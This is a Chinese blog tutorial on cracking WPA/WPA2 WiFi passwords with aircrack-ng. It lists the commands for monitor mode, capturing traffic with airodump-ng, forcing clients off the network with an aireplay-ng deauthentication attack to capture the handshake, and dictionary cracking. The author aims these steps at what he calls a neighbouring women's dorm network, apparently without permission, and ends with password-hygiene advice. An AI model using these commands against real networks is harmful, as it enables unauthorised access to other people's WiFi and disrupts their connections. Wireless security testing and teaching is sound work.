Aircrack-ng破解无线网络

Part1:破解无线网络,这里我使用的工具是aircrack-ng,比起傻瓜式的工具CD-linux(奶瓶),这个更具有技术含量,更接近原理,当然新手也会能难操作。

 

Part2:原理设置网卡为监听模式后搜索AP信号,然后通过设置MAC地址嗅探某信道的某AP,期间可以发送中断连接的数据包来导致设备掉线重连以得到握手包,然后通过字典匹配握手包中的加密数据。

 

Part3基本命令:

iwconfig查看网卡信息.

airmon-ng:查看网卡型号与芯片.

ifconfig wlan0 down:卸载无线网卡.

iwconfig wlan0 mode montior:将无线网卡设置为监听模式.

ifconfig wlan0 up:加载无线网卡.

airodump-ng wlan0:开启无线网络查看模式.

airodump-ng -w 握手包名称.cap -c 信道 --bssid AP’sMAC wlan0:嗅探某个信道的某个AP.

aireplay-ng -0 攻击次数 -a AP’sMAC wlan0:攻击AP使设备断线重连得到握手包。

aircrack-ng 握手包路径 -w 字典路径:破解无线密码.


Part3:实验环境:

我用的是拓实N95无线网卡,芯片是Ralink RT2870/3070

攻击平台:kali linux 1

 

Part4:演示过程:

1:首先使用iwconfig命令查看无线网卡是否加载.

 

1-1.

2如果使用airodump-ng wlan0查看附近无线AP报错了,是因为网卡没有设置成监听模式(mode monitor),使用下面的命令可以解决问题。

 

1-2.

3:先卸载无线网卡,然后将无线网卡设置为监听模式,然后加载无线网卡即可解决问题。

 

1-3.

4:重新查看附近的无线AP,发现了很多AP信号及详细信息。

 

1-4.

 

1-5.

5:这里我选择要嗅探的无线网络为213WIF,这是楼下女生宿舍的WiFi,你懂的。。。

 

1-6.

-w 指定嗅探文件.cap保存的路径, -c指定无线网络的信道(CH),--bssid指定嗅探的APMACwlan0表示你的无线网卡。

 

6:这时我们可以按ctrl+shift+t打开一个新的窗口,发送让AP与客户端断开连接的数据包,以便快速得到握手包,这里可能会报错,提示说你监听的信道与AP的信道不符,这里不用管,更改攻击次数多试几次即可

 

1-7.

aireplay-ng -0 攻击次数(如果为0表示无限循环)-a AP’MAC wlan0。

 

7:经过一段时间后,我们查看嗅探界面,发现已经捕获到了WPA握手包(handshake)。

 

1-8.

8:接下来就是漫长的破解工作了,少则十分钟,多则无限,这里看你的字典是否强大,使用命令:aircrack-ng  握手包路径 –w 字典路径 就可以加载字典进行密码匹配。

 

1-9.

9KEY FOUND!

 

1-10.

 

End:我这里仅仅是做测试,已经把密码添加进了字典里(网上99%的教程也是如此),跑出来只是时间罢了,现实中是没有这么容易的;

从这篇教程可以看出WPA/WPA2加密也是不安全的,因此,看完后,你下一秒要做的事情就是更改自己的WiFi密码和路由器的登录密码,为了安全起见,WiFi密码请使用字母+符号+数字的方式且每隔几个月换一次。

  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值